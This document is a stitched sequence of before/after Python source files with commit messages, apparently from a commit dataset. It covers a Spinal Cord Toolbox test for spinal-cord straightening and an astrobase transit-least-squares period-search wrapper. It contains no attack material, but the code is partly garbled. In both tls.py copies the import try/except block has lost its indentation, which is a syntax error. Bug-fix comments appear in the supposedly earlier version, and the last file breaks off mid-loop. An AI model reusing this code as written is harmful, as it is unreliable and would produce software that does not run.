        subject_folder = subject_folder[-1]
    path_output = sct.slash_at_the_end('sct_straighten_spinalcord_' + subject_folder + '_' + time.strftime("%y%m%d%H%M%S") + '_'+str(random.randint(1, 1000000)), slash=1)
    param_with_path += ' -ofolder ' + path_output
    # run command
    cmd = 'sct_straighten_spinalcord ' + param_with_path
    output = '\n====================================================================================================\n'+cmd+'\n====================================================================================================\n\n'  # copy command
    time_start = time.time()
    status, o = sct.run(cmd, 0)
    output += o
    duration = time.time() - time_start
    # initialization of results: must be NaN if test fails
    # BUGFIX: result_dice is referenced in the final DataFrame even when the
    # straightening command fails, so it must be initialized here as well
    # (previously a NameError when status != 0).
    result_mse, result_dist_max, result_dice = float('nan'), float('nan'), float('nan')
    if status == 0:
        # extraction of results
        output_split = output.split('Maximum x-y error = ')[1].split(' mm')
        result_dist_max = float(output_split[0])
        result_mse = float(output_split[1].split('Accuracy of straightening (MSE) = ')[1])
        # integrity testing: metrics must stay below fixed thresholds
        th_result_dist_max = 4.0
        if result_dist_max > th_result_dist_max:
            status = 99
            # BUGFIX: message previously printed '<' although the condition is '>'
            output += '\nWARNING: Maximum x-y error = '+str(result_dist_max)+' > '+str(th_result_dist_max)
        th_result_mse = 1.5
        if result_mse > th_result_mse:
            status = 99
            # BUGFIX: message previously printed '<' although the condition is '>'
            output += '\nWARNING: RMSE = '+str(result_mse)+' > '+str(th_result_mse)
        # apply curved2straight, then straight2curve, then compare results
        path_input, file_input, ext_input = sct.extract_fname(dict_param_with_path['-i'])
        sct.run('sct_apply_transfo -i '+dict_param_with_path['-s']+' -d '+path_output+file_input+'_straight'+ext_input+' -w '+path_output+'warp_curve2straight.nii.gz -o '+path_output+'tmp_seg_straight.nii.gz -x linear', 0)
        sct.run('sct_apply_transfo -i '+path_output+'tmp_seg_straight.nii.gz -d '+dict_param_with_path['-s']+' -w '+path_output+'warp_straight2curve.nii.gz -o '+path_output+'tmp_seg_straight_curved.nii.gz -x nn', 0)
        # threshold and binarize
        sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -thr 0.5 -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
        sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -bin -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
        # compute DICE between the round-tripped segmentation and the original
        # BUGFIX: compare against the input segmentation ('-s'); '-c' is not a
        # parsed parameter and raised a KeyError.
        cmd = 'sct_dice_coefficient -i '+path_output+'tmp_seg_straight_curved.nii.gz -d ' + dict_param_with_path['-s']
        status2, output2 = sct.run(cmd, 0)
        # parse output and compare to acceptable threshold
        result_dice = float(output2.split('3D Dice coefficient = ')[1].split('\n')[0])
        th_dice = 0.95
        if result_dice < th_dice:
            status = 99
            output += '\nWARNING: DICE = '+str(result_dice)+' < '+str(th_dice)
    # transform results into Pandas structure
    results = DataFrame(data={'status': status, 'output': output, 'mse': result_mse, 'dist_max': result_dist_max, 'dice': result_dice, 'duration': duration}, index=[path_data])
    return status, output, results
if __name__ == "__main__":
    # Run the integrity test with default parameters when executed directly.
    test()
REF test using new flags
Former-commit-id: d9cf8fc0dba907f28f75938692cfb09e9787925b
Former-commit-id: d0352fdbc0ea4d2f14f1e2e97ae4b1d56e6d853c
#!/usr/bin/env python
#########################################################################################
#
# Test function for sct_sctraighten_spinalcord script
#
# replace the shell test script in sct 1.0
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2014 Polytechnique Montreal <www.neuro.polymtl.ca>
# Author: Augustin Roux
# modified: 2014/09/28
#
# About the license: see the file LICENSE.TXT
#########################################################################################
import sct_utils as sct
from msct_parser import Parser
import sct_straighten_spinalcord
from pandas import DataFrame
import os.path
def test(path_data='', parameters=''):
    """Integrity test for sct_straighten_spinalcord.

    Straightens the input spinal-cord image, extracts the accuracy metrics
    (maximum x-y error, MSE) from the command output and checks them against
    fixed thresholds, then round-trips the segmentation through the
    curve->straight and straight->curve warping fields and checks the Dice
    coefficient against the original segmentation.

    :param path_data: path to the folder containing the test data.
    :param parameters: arguments forwarded to sct_straighten_spinalcord
        (defaults to the bundled t2 test data set).
    :return: tuple (status, output, results) where status is 0 on success,
        99 when an integrity threshold is violated, 200 when input files are
        missing; output is the accumulated log text; results is a pandas
        DataFrame indexed by path_data.
    """
    if not parameters:
        parameters = '-i t2/t2.nii.gz -s t2/t2_seg.nii.gz -qc 0'
    parser = sct_straighten_spinalcord.get_parser()
    dict_param = parser.parse(parameters.split(), check_file_exist=False)
    dict_param_with_path = parser.add_path_to_file(dict_param, path_data, input_file=True)
    param_with_path = parser.dictionary_to_string(dict_param_with_path)
    # Check if input files exist
    if not (os.path.isfile(dict_param_with_path['-i']) and os.path.isfile(dict_param_with_path['-s'])):
        status = 200
        output = 'ERROR: the file(s) provided to test function do not exist in folder: ' + path_data
        return status, output, DataFrame(data={'status': status, 'output': output, 'mse': float('nan'), 'dist_max': float('nan')}, index=[path_data])
    # create output folder to deal with multithreading (i.e., we don't want to have outputs from several subjects in the current directory)
    import time, random
    subject_folder = path_data.split('/')
    if subject_folder[-1] == '' and len(subject_folder) > 1:
        subject_folder = subject_folder[-2]
    else:
        subject_folder = subject_folder[-1]
    # unique output folder name: subject + timestamp + random suffix
    path_output = sct.slash_at_the_end('sct_straighten_spinalcord_' + subject_folder + '_' + time.strftime("%y%m%d%H%M%S") + '_'+str(random.randint(1, 1000000)), slash=1)
    param_with_path += ' -ofolder ' + path_output
    # run command
    cmd = 'sct_straighten_spinalcord ' + param_with_path
    output = '\n====================================================================================================\n'+cmd+'\n====================================================================================================\n\n' # copy command
    time_start = time.time()
    status, o = sct.run(cmd, 0)
    output += o
    duration = time.time() - time_start
    # initialization of results: must be NaN if test fails
    # NOTE(review): result_dice is NOT initialized here but is referenced in
    # the final DataFrame below -- this raises NameError when status != 0.
    result_mse, result_dist_max = float('nan'), float('nan')
    if status == 0:
        # extraction of results
        output_split = output.split('Maximum x-y error = ')[1].split(' mm')
        result_dist_max = float(output_split[0])
        result_mse = float(output_split[1].split('Accuracy of straightening (MSE) = ')[1])
        # integrity testing: metrics must stay below fixed thresholds
        th_result_dist_max = 4.0
        if result_dist_max > th_result_dist_max:
            status = 99
            # NOTE(review): message prints '<' but the condition that fired is '>' -- confirm intended wording
            output += '\nWARNING: Maximum x-y error = '+str(result_dist_max)+' < '+str(th_result_dist_max)
        th_result_mse = 1.5
        if result_mse > th_result_mse:
            status = 99
            # NOTE(review): same inverted comparison symbol in the message
            output += '\nWARNING: RMSE = '+str(result_mse)+' < '+str(th_result_mse)
        # apply curved2straight, then straight2curve, then compared results
        path_input, file_input, ext_input = sct.extract_fname(dict_param_with_path['-i'])
        sct.run('sct_apply_transfo -i '+dict_param_with_path['-s']+' -d '+path_output+file_input+'_straight'+ext_input+' -w '+path_output+'warp_curve2straight.nii.gz -o '+path_output+'tmp_seg_straight.nii.gz -x linear', 0)
        sct.run('sct_apply_transfo -i '+path_output+'tmp_seg_straight.nii.gz -d '+dict_param_with_path['-s']+' -w '+path_output+'warp_straight2curve.nii.gz -o '+path_output+'tmp_seg_straight_curved.nii.gz -x nn', 0)
        # threshold and binarize
        sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -thr 0.5 -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
        sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -bin -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
        # compute DICE between the round-tripped segmentation and the original
        cmd = 'sct_dice_coefficient -i '+path_output+'tmp_seg_straight_curved.nii.gz -d ' + dict_param_with_path['-s']
        status2, output2 = sct.run(cmd, 0)
        # parse output and compare to acceptable threshold
        result_dice = float(output2.split('3D Dice coefficient = ')[1].split('\n')[0])
        th_dice = 0.95
        if result_dice < th_dice:
            status = 99
            output += '\nWARNING: DICE = '+str(result_dice)+' < '+str(th_dice)
    # transform results into Pandas structure
    results = DataFrame(data={'status': status, 'output': output, 'mse': result_mse, 'dist_max': result_dist_max, 'dice': result_dice, 'duration': duration}, index=[path_data])
    return status, output, results
if __name__ == "__main__":
    # Run the integrity test with default parameters when executed directly.
    test()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tls.py - Luke Bouma (luke@astro.princeton.edu) - Apr 2019
"""
Contains the Hippke & Heller (2019) transit-least-squared period-search
algorithm implementation for periodbase. This depends on the external package
written by Hippke & Heller, https://github.com/hippke/tls.
"""
#############
## LOGGING ##
#############
import logging
from astrobase import log_sub, log_fmt, log_date_fmt
# Module-level logging setup: flip DEBUG to True for verbose output.
DEBUG = False
if DEBUG:
    level = logging.DEBUG
else:
    level = logging.INFO
LOGGER = logging.getLogger(__name__)
# Configure the root logger with the astrobase-wide format strings.
logging.basicConfig(
    level=level,
    style=log_sub,
    format=log_fmt,
    datefmt=log_date_fmt,
)
# Convenience aliases used throughout this module.
LOGDEBUG = LOGGER.debug
LOGINFO = LOGGER.info
LOGWARNING = LOGGER.warning
LOGERROR = LOGGER.error
LOGEXCEPTION = LOGGER.exception
#############
## IMPORTS ##
#############
import numpy as np
from multiprocessing import Pool, cpu_count
from math import fmod
from numpy import (
nan as npnan, arange as nparange, array as nparray,
isfinite as npisfinite, argmax as npargmax, linspace as nplinspace,
ceil as npceil, argsort as npargsort, concatenate as npconcatenate
)
from astropy import units as u
try:
from transitleastsquares import transitleastsquares
except:
errmsg = (
'tried importing transitleastsquares and failed.\n'
'are you sure you have installed it correctly?\n'
'see https://transitleastsquares.readthedocs.io/en/latest/Installation.html'
)
raise ImportError(errmsg)
###################
## LOCAL IMPORTS ##
###################
from ..lcmath import sigclip_magseries
############
## CONFIG ##
############
# Default worker count for the parallel period-search: all logical CPUs.
NCPUS = cpu_count()
#######################
## UTILITY FUNCTIONS ##
#######################
def tls_parallel_pfind(times, mags, errs,
                       magsarefluxes=None,
                       startp=0.1,  # search from 0.1 d to...
                       endp=None,   # determine automatically from times
                       tlsoversample=5,
                       tlsmintransits=3,
                       tls_transit_template='default',
                       tls_R_star_min=0.13,
                       tls_R_star_max=3.5,
                       tls_M_star_min=0.1,
                       tls_M_star_max=2.0,
                       periodepsilon=0.1,
                       nbestpeaks=5,
                       sigclip=10.0,
                       verbose=True,
                       nworkers=None):
    """Wrapper to Hippke & Heller (2019)'s "transit least squares", which is
    BLS, but with a slightly better template (and niceties in the
    implementation).

    A few comments:

    * The time series must be in units of days.

    * The frequency sampling Hippke & Heller (2019) advocate for is cubic in
      frequencies, instead of linear. Ofir (2014) found that the
      linear-in-frequency sampling (which is correct for sinusoidal signal
      detection) isn't optimal for a Keplerian box signal. He gave an equation
      for "optimal" sampling. `tlsoversample` is the factor by which to
      oversample over that. The grid can be imported independently via::

        from transitleastsquares import period_grid

      The spacing equations are given here:
      https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#period-grid

    * The boundaries of the period search are by default 0.1 day to 99% the
      baseline of times.

    Parameters
    ----------

    times,mags,errs : np.array
        The magnitude/flux time-series to search for transits.

    magsarefluxes : bool
        `transitleastsquares` requires fluxes. Therefore if magsarefluxes is
        set to false, the passed mags are converted to fluxes. All output
        dictionary vectors include fluxes, not mags.

    startp,endp : float
        The minimum and maximum periods to consider for the transit search.

    tlsoversample : int
        Factor by which to oversample the frequency grid.

    tlsmintransits : int
        Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
        function.

    tls_transit_template: str
        `default`, `grazing`, or `box`.

    tls_R_star_min, tls_R_star_max, tls_M_star_min, tls_M_star_max : float
        The range of stellar values used to create the frequency grid.

    periodepsilon : float
        The fractional difference between successive values of 'best' periods
        when sorting by periodogram power to consider them as separate periods
        (as opposed to part of the same periodogram peak). This is used to
        avoid broad peaks in the periodogram and make sure the 'best' periods
        returned are all actually independent.

    nbestpeaks : int
        The number of 'best' peaks to return from the periodogram results,
        starting from the global maximum of the periodogram peak values.

    sigclip : float or int or sequence of two floats/ints or None
        If a single float or int, a symmetric sigma-clip will be performed
        using the number provided as the sigma-multiplier to cut out from the
        input time-series.

        If a list of two ints/floats is provided, the function will perform an
        'asymmetric' sigma-clip. The first element in this list is the sigma
        value to use for fainter flux/mag values; the second element in this
        list is the sigma value to use for brighter flux/mag values. For
        example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
        dimmings and greater than 3-sigma brightenings. Here the meaning of
        "dimming" and "brightening" is set by *physics* (not the magnitude
        system), which is why the `magsarefluxes` kwarg must be correctly set.

        If `sigclip` is None, no sigma-clipping will be performed, and the
        time-series (with non-finite elems removed) will be passed through to
        the output.

    verbose : bool
        Kept for consistency with `periodbase` functions.

    nworkers : int or None
        The number of parallel workers to launch for period-search. If None,
        nworkers = NCPUS.

    Returns
    -------

    dict
        This function returns a dict, referred to as an `lspinfo` dict in
        other astrobase functions that operate on periodogram results. The
        format is similar to the other astrobase period-finders -- it contains
        the nbestpeaks, which is the most important thing. (But isn't entirely
        standardized.)

        Crucially, it also contains "tlsresult", which is a dictionary with
        transitleastsquares spectra (used to get the SDE as defined in the TLS
        paper), statistics, transit period, mid-time, duration, depth, SNR,
        and the "odd_even_mismatch" statistic. The full key list is::

            dict_keys(['SDE', 'SDE_raw', 'chi2_min', 'chi2red_min', 'period',
            'period_uncertainty', 'T0', 'duration', 'depth', 'depth_mean',
            'depth_mean_even', 'depth_mean_odd', 'transit_depths',
            'transit_depths_uncertainties', 'rp_rs', 'snr', 'snr_per_transit',
            'snr_pink_per_transit', 'odd_even_mismatch', 'transit_times',
            'per_transit_count', 'transit_count', 'distinct_transit_count',
            'empty_transit_count', 'FAP', 'in_transit_count',
            'after_transit_count', 'before_transit_count', 'periods', 'power',
            'power_raw', 'SR', 'chi2', 'chi2red', 'model_lightcurve_time',
            'model_lightcurve_model', 'model_folded_phase', 'folded_y',
            'folded_dy', 'folded_phase', 'model_folded_model'])

        The descriptions are here::

            https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#return-values

        The remaining resultdict is::

            resultdict = {
                'tlsresult':tlsresult,
                'bestperiod': the best period value in the periodogram,
                'bestlspval': the periodogram peak associated with the best period,
                'nbestpeaks': the input value of nbestpeaks,
                'nbestlspvals': nbestpeaks-size list of best period peak values,
                'nbestperiods': nbestpeaks-size list of best periods,
                'lspvals': the full array of periodogram powers,
                'periods': the full array of periods considered,
                'tlsresult': Astropy tls result object (BoxLeastSquaresResult),
                'tlsmodel': Astropy tls BoxLeastSquares object used for work,
                'method':'tls' -> the name of the period-finder method,
                'kwargs':{ dict of all of the input kwargs for record-keeping}
            }

    """

    # transitleastsquares requires relative fluxes, so convert mags if needed
    if not magsarefluxes:

        LOGWARNING('transitleastsquares requires relative flux...')
        LOGWARNING('converting input mags to relative flux...')
        LOGWARNING('and forcing magsarefluxes=True...')

        mag_0, f_0 = 12, 1e4
        # BUGFIX: the conversion used an undefined name `mag`; the input
        # magnitude array is `mags` (NameError on the default path before).
        flux = f_0 * 10**( -0.4 * (mags - mag_0) )
        flux /= np.nanmedian(flux)

        mags = flux
        magsarefluxes = True

    if nworkers is None:
        nworkers = NCPUS

    if errs is None:
        # uniform weights
        # BUGFIX: `flux` only exists when the mag->flux conversion above ran;
        # use `mags`, which is always defined at this point.
        errs = np.ones_like(mags)*1e-4

    # get rid of nans first and sigclip
    stimes, smags, serrs = sigclip_magseries(times, mags, errs,
                                             magsarefluxes=magsarefluxes,
                                             sigclip=sigclip)

    # make sure there are enough points to calculate a spectrum
    if not (len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9):

        LOGERROR('no good detections for these times and mags, skipping...')
        resultdict = {
            'tlsresult':npnan,
            'bestperiod':npnan,
            'bestlspval':npnan,
            'nbestpeaks':nbestpeaks,
            'nbestinds':None,
            'nbestlspvals':None,
            'nbestperiods':None,
            'lspvals':None,
            'periods':None,
            'method':'tls',
            'kwargs':{'startp':startp,
                      'endp':endp,
                      'tlsoversample':tlsoversample,
                      'tlsntransits':tlsmintransits,
                      'periodepsilon':periodepsilon,
                      'nbestpeaks':nbestpeaks,
                      'sigclip':sigclip,
                      'magsarefluxes':magsarefluxes}
        }
        return resultdict

    if endp is None:
        # out to 99% of the baseline. (for two transits).
        endp = 0.99*(np.nanmax(stimes) - np.nanmin(stimes))

    # run periodogram
    model = transitleastsquares(stimes, smags, serrs)
    # BUGFIX: R_star_max was passed tls_R_star_min, collapsing the stellar
    # radius range used to build the period grid to a single value.
    tlsresult = model.power(use_threads=nworkers, show_progress_bar=False,
                            R_star_min=tls_R_star_min,
                            R_star_max=tls_R_star_max,
                            M_star_min=tls_M_star_min,
                            M_star_max=tls_M_star_max,
                            period_min=startp, period_max=endp,
                            n_transits_min=tlsmintransits,
                            transit_template=tls_transit_template,
                            oversampling_factor=tlsoversample)

    # get the peak values
    lsp = nparray(tlsresult.power)
    periods = nparray(tlsresult.periods)

    # find the nbestpeaks for the periodogram: 1. sort the lsp array by
    # highest value first 2. go down the values until we find five values
    # that are separated by at least periodepsilon in period. make sure to
    # get only the finite peaks in the periodogram; this is needed because
    # tls may produce infs for some peaks
    finitepeakind = npisfinite(lsp)
    finlsp = lsp[finitepeakind]
    finperiods = periods[finitepeakind]

    # make sure that finlsp has finite values before we work on it
    try:
        bestperiodind = npargmax(finlsp)
    except ValueError:
        LOGERROR('no finite periodogram values '
                 'for this mag series, skipping...')
        resultdict = {
            'tlsresult':npnan,
            'bestperiod':npnan,
            'bestlspval':npnan,
            'nbestpeaks':nbestpeaks,
            'nbestinds':None,
            'nbestlspvals':None,
            'nbestperiods':None,
            'lspvals':None,
            'periods':None,
            'method':'tls',
            'kwargs':{'startp':startp,
                      'endp':endp,
                      'tlsoversample':tlsoversample,
                      'tlsntransits':tlsmintransits,
                      'periodepsilon':periodepsilon,
                      'nbestpeaks':nbestpeaks,
                      'sigclip':sigclip,
                      'magsarefluxes':magsarefluxes}
        }
        return resultdict

    sortedlspind = npargsort(finlsp)[::-1]
    sortedlspperiods = finperiods[sortedlspind]
    sortedlspvals = finlsp[sortedlspind]

    # now get the nbestpeaks
    nbestperiods, nbestlspvals, nbestinds, peakcount = (
        [finperiods[bestperiodind]],
        [finlsp[bestperiodind]],
        [bestperiodind],
        1
    )
    prevperiod = sortedlspperiods[0]

    # find the best nbestpeaks in the lsp and their periods
    for period, lspval, ind in zip(sortedlspperiods,
                                   sortedlspvals,
                                   sortedlspind):

        if peakcount == nbestpeaks:
            break

        perioddiff = abs(period - prevperiod)
        bestperiodsdiff = [abs(period - x) for x in nbestperiods]

        # this ensures that this period is different from the last
        # period and from all the other existing best periods by
        # periodepsilon to make sure we jump to an entire different
        # peak in the periodogram
        if (perioddiff > (periodepsilon*prevperiod) and
            all(x > (periodepsilon*period)
                for x in bestperiodsdiff)):
            nbestperiods.append(period)
            nbestlspvals.append(lspval)
            nbestinds.append(ind)
            peakcount = peakcount + 1

        prevperiod = period

    # generate the return dict
    resultdict = {
        'tlsresult':tlsresult,
        'bestperiod':finperiods[bestperiodind],
        'bestlspval':finlsp[bestperiodind],
        'nbestpeaks':nbestpeaks,
        'nbestinds':nbestinds,
        'nbestlspvals':nbestlspvals,
        'nbestperiods':nbestperiods,
        'lspvals':lsp,
        'periods':periods,
        'method':'tls',
        'kwargs':{'startp':startp,
                  'endp':endp,
                  'tlsoversample':tlsoversample,
                  'tlsntransits':tlsmintransits,
                  'periodepsilon':periodepsilon,
                  'nbestpeaks':nbestpeaks,
                  'sigclip':sigclip,
                  'magsarefluxes':magsarefluxes}
    }

    return resultdict
fix bug
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tls.py - Luke Bouma (luke@astro.princeton.edu) - Apr 2019
"""
Contains the Hippke & Heller (2019) transit-least-squared period-search
algorithm implementation for periodbase. This depends on the external package
written by Hippke & Heller, https://github.com/hippke/tls.
"""
#############
## LOGGING ##
#############
import logging
from astrobase import log_sub, log_fmt, log_date_fmt
# Module-level logging setup: flip DEBUG to True for verbose output.
DEBUG = False
if DEBUG:
    level = logging.DEBUG
else:
    level = logging.INFO
LOGGER = logging.getLogger(__name__)
# Configure the root logger with the astrobase-wide format strings.
logging.basicConfig(
    level=level,
    style=log_sub,
    format=log_fmt,
    datefmt=log_date_fmt,
)
# Convenience aliases used throughout this module.
LOGDEBUG = LOGGER.debug
LOGINFO = LOGGER.info
LOGWARNING = LOGGER.warning
LOGERROR = LOGGER.error
LOGEXCEPTION = LOGGER.exception
#############
## IMPORTS ##
#############
import numpy as np
from multiprocessing import Pool, cpu_count
from math import fmod
from numpy import (
nan as npnan, arange as nparange, array as nparray,
isfinite as npisfinite, argmax as npargmax, linspace as nplinspace,
ceil as npceil, argsort as npargsort, concatenate as npconcatenate
)
from astropy import units as u
try:
from transitleastsquares import transitleastsquares
except:
errmsg = (
'tried importing transitleastsquares and failed.\n'
'are you sure you have installed it correctly?\n'
'see https://transitleastsquares.readthedocs.io/en/latest/Installation.html'
)
raise ImportError(errmsg)
###################
## LOCAL IMPORTS ##
###################
from ..lcmath import sigclip_magseries
############
## CONFIG ##
############
# Default worker count for the parallel period-search: all logical CPUs.
NCPUS = cpu_count()
#######################
## UTILITY FUNCTIONS ##
#######################
def tls_parallel_pfind(times, mags, errs,
                       magsarefluxes=None,
                       startp=0.1,  # search from 0.1 d to...
                       endp=None,   # determine automatically from times
                       tlsoversample=5,
                       tlsmintransits=3,
                       tls_transit_template='default',
                       tls_R_star_min=0.13,
                       tls_R_star_max=3.5,
                       tls_M_star_min=0.1,
                       tls_M_star_max=2.0,
                       periodepsilon=0.1,
                       nbestpeaks=5,
                       sigclip=10.0,
                       verbose=True,
                       nworkers=None):
    """Wrapper to Hippke & Heller (2019)'s "transit least squares", which is
    BLS, but with a slightly better template (and niceties in the
    implementation).

    A few comments:

    * The time series must be in units of days.

    * The frequency sampling Hippke & Heller (2019) advocate for is cubic in
      frequencies, instead of linear. Ofir (2014) found that the
      linear-in-frequency sampling (which is correct for sinusoidal signal
      detection) isn't optimal for a Keplerian box signal. He gave an equation
      for "optimal" sampling. `tlsoversample` is the factor by which to
      oversample over that. The grid can be imported independently via::

        from transitleastsquares import period_grid

      The spacing equations are given here:
      https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#period-grid

    * The boundaries of the period search are by default 0.1 day to 99% the
      baseline of times.

    Parameters
    ----------

    times,mags,errs : np.array
        The magnitude/flux time-series to search for transits.

    magsarefluxes : bool
        `transitleastsquares` requires fluxes. Therefore if magsarefluxes is
        set to false, the passed mags are converted to fluxes. All output
        dictionary vectors include fluxes, not mags.

    startp,endp : float
        The minimum and maximum periods to consider for the transit search.

    tlsoversample : int
        Factor by which to oversample the frequency grid.

    tlsmintransits : int
        Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
        function.

    tls_transit_template: str
        `default`, `grazing`, or `box`.

    tls_R_star_min, tls_R_star_max, tls_M_star_min, tls_M_star_max : float
        The range of stellar values used to create the frequency grid.

    periodepsilon : float
        The fractional difference between successive values of 'best' periods
        when sorting by periodogram power to consider them as separate periods
        (as opposed to part of the same periodogram peak). This is used to
        avoid broad peaks in the periodogram and make sure the 'best' periods
        returned are all actually independent.

    nbestpeaks : int
        The number of 'best' peaks to return from the periodogram results,
        starting from the global maximum of the periodogram peak values.

    sigclip : float or int or sequence of two floats/ints or None
        If a single float or int, a symmetric sigma-clip will be performed
        using the number provided as the sigma-multiplier to cut out from the
        input time-series.

        If a list of two ints/floats is provided, the function will perform an
        'asymmetric' sigma-clip. The first element in this list is the sigma
        value to use for fainter flux/mag values; the second element in this
        list is the sigma value to use for brighter flux/mag values. For
        example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
        dimmings and greater than 3-sigma brightenings. Here the meaning of
        "dimming" and "brightening" is set by *physics* (not the magnitude
        system), which is why the `magsarefluxes` kwarg must be correctly set.

        If `sigclip` is None, no sigma-clipping will be performed, and the
        time-series (with non-finite elems removed) will be passed through to
        the output.

    verbose : bool
        Kept for consistency with `periodbase` functions.

    nworkers : int or None
        The number of parallel workers to launch for period-search. If None,
        nworkers = NCPUS.

    Returns
    -------

    dict
        This function returns a dict, referred to as an `lspinfo` dict in
        other astrobase functions that operate on periodogram results. The
        format is similar to the other astrobase period-finders -- it contains
        the nbestpeaks, which is the most important thing. (But isn't entirely
        standardized.)

        Crucially, it also contains "tlsresult", which is a dictionary with
        transitleastsquares spectra (used to get the SDE as defined in the TLS
        paper), statistics, transit period, mid-time, duration, depth, SNR,
        and the "odd_even_mismatch" statistic. The full key list is::

            dict_keys(['SDE', 'SDE_raw', 'chi2_min', 'chi2red_min', 'period',
            'period_uncertainty', 'T0', 'duration', 'depth', 'depth_mean',
            'depth_mean_even', 'depth_mean_odd', 'transit_depths',
            'transit_depths_uncertainties', 'rp_rs', 'snr', 'snr_per_transit',
            'snr_pink_per_transit', 'odd_even_mismatch', 'transit_times',
            'per_transit_count', 'transit_count', 'distinct_transit_count',
            'empty_transit_count', 'FAP', 'in_transit_count',
            'after_transit_count', 'before_transit_count', 'periods', 'power',
            'power_raw', 'SR', 'chi2', 'chi2red', 'model_lightcurve_time',
            'model_lightcurve_model', 'model_folded_phase', 'folded_y',
            'folded_dy', 'folded_phase', 'model_folded_model'])

        The descriptions are here::

            https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#return-values

        The remaining resultdict is::

            resultdict = {
                'tlsresult':tlsresult,
                'bestperiod': the best period value in the periodogram,
                'bestlspval': the periodogram peak associated with the best period,
                'nbestpeaks': the input value of nbestpeaks,
                'nbestlspvals': nbestpeaks-size list of best period peak values,
                'nbestperiods': nbestpeaks-size list of best periods,
                'lspvals': the full array of periodogram powers,
                'periods': the full array of periods considered,
                'tlsresult': Astropy tls result object (BoxLeastSquaresResult),
                'tlsmodel': Astropy tls BoxLeastSquares object used for work,
                'method':'tls' -> the name of the period-finder method,
                'kwargs':{ dict of all of the input kwargs for record-keeping}
            }

    """

    # transitleastsquares requires relative fluxes, so convert mags if needed
    if not magsarefluxes:

        LOGWARNING('transitleastsquares requires relative flux...')
        LOGWARNING('converting input mags to relative flux...')
        LOGWARNING('and forcing magsarefluxes=True...')

        mag_0, f_0 = 12, 1e4
        # BUGFIX: the conversion used an undefined name `mag`; the input
        # magnitude array is `mags` (NameError on the default path before).
        flux = f_0 * 10**( -0.4 * (mags - mag_0) )
        flux /= np.nanmedian(flux)

        mags = flux
        magsarefluxes = True

    if nworkers is None:
        nworkers = NCPUS

    if errs is None:
        # uniform weights
        # BUGFIX: `flux` only exists when the mag->flux conversion above ran;
        # use `mags`, which is always defined at this point.
        errs = np.ones_like(mags)*1e-4

    # get rid of nans first and sigclip
    stimes, smags, serrs = sigclip_magseries(times, mags, errs,
                                             magsarefluxes=magsarefluxes,
                                             sigclip=sigclip)

    # make sure there are enough points to calculate a spectrum
    if not (len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9):

        LOGERROR('no good detections for these times and mags, skipping...')
        resultdict = {
            'tlsresult':npnan,
            'bestperiod':npnan,
            'bestlspval':npnan,
            'nbestpeaks':nbestpeaks,
            'nbestinds':None,
            'nbestlspvals':None,
            'nbestperiods':None,
            'lspvals':None,
            'periods':None,
            'method':'tls',
            'kwargs':{'startp':startp,
                      'endp':endp,
                      'tlsoversample':tlsoversample,
                      'tlsntransits':tlsmintransits,
                      'periodepsilon':periodepsilon,
                      'nbestpeaks':nbestpeaks,
                      'sigclip':sigclip,
                      'magsarefluxes':magsarefluxes}
        }
        return resultdict

    if endp is None:
        # out to 99% of the baseline. (for two transits).
        endp = 0.99*(np.nanmax(stimes) - np.nanmin(stimes))

    # run periodogram
    model = transitleastsquares(stimes, smags, serrs)
    tlsresult = model.power(use_threads=nworkers, show_progress_bar=False,
                            R_star_min=tls_R_star_min,
                            R_star_max=tls_R_star_max,
                            M_star_min=tls_M_star_min,
                            M_star_max=tls_M_star_max,
                            period_min=startp, period_max=endp,
                            n_transits_min=tlsmintransits,
                            transit_template=tls_transit_template,
                            oversampling_factor=tlsoversample)

    # get the peak values
    lsp = nparray(tlsresult.power)
    periods = nparray(tlsresult.periods)

    # find the nbestpeaks for the periodogram: 1. sort the lsp array by
    # highest value first 2. go down the values until we find five values
    # that are separated by at least periodepsilon in period. make sure to
    # get only the finite peaks in the periodogram; this is needed because
    # tls may produce infs for some peaks
    finitepeakind = npisfinite(lsp)
    finlsp = lsp[finitepeakind]
    finperiods = periods[finitepeakind]

    # make sure that finlsp has finite values before we work on it
    try:
        bestperiodind = npargmax(finlsp)
    except ValueError:
        LOGERROR('no finite periodogram values '
                 'for this mag series, skipping...')
        resultdict = {
            'tlsresult':npnan,
            'bestperiod':npnan,
            'bestlspval':npnan,
            'nbestpeaks':nbestpeaks,
            'nbestinds':None,
            'nbestlspvals':None,
            'nbestperiods':None,
            'lspvals':None,
            'periods':None,
            'method':'tls',
            'kwargs':{'startp':startp,
                      'endp':endp,
                      'tlsoversample':tlsoversample,
                      'tlsntransits':tlsmintransits,
                      'periodepsilon':periodepsilon,
                      'nbestpeaks':nbestpeaks,
                      'sigclip':sigclip,
                      'magsarefluxes':magsarefluxes}
        }
        return resultdict

    sortedlspind = npargsort(finlsp)[::-1]
    sortedlspperiods = finperiods[sortedlspind]
    sortedlspvals = finlsp[sortedlspind]

    # now get the nbestpeaks
    nbestperiods, nbestlspvals, nbestinds, peakcount = (
        [finperiods[bestperiodind]],
        [finlsp[bestperiodind]],
        [bestperiodind],
        1
    )
    prevperiod = sortedlspperiods[0]

    # find the best nbestpeaks in the lsp and their periods
    for period, lspval, ind in zip(sortedlspperiods,
                                   sortedlspvals,
                                   sortedlspind):

        if peakcount == nbestpeaks:
            break

        perioddiff = abs(period - prevperiod)
        bestperiodsdiff = [abs(period - x) for x in nbestperiods]

        # this ensures that this period is different from the last
